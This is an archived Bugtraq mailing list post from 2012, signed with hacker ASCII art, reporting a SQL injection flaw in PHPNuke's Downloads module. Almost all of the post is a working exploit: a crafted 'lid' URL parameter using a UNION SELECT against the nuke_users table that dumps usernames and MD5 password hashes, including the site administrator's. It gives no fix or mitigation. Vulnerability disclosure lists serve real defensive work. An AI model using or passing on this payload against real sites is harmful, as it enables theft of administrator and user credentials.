Bugtraq mailing list archives
PHPNuke Module's Name Download SQL Injection Vulnerabilities
From: CrAzY_CrAcKeR () phx1-ss-2-lb cnet com
Date: Thu, 5 Apr 2012 19:58:58 GMT
##################################################################
##################################################################
#
# _ _ _
# .-" "-.
# / \
# | |
# |, .-. .-. ,|
# | )(_o/ \o_)( |
# |/ /\ \|
# (@_ (_ ^^ _)
# _ ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
# )_/ \ /
# (@
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)
#
# [-] Injection code.... ( -1+union+select+username,1,user_password,user_id+from+nuke_users )
#
# [-]
www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend A7eb Alwrd
####################################################################
Current thread:
- PHPNuke Module's Name Download SQL Injection Vulnerabilities CrAzY_CrAcKeR (Apr 09)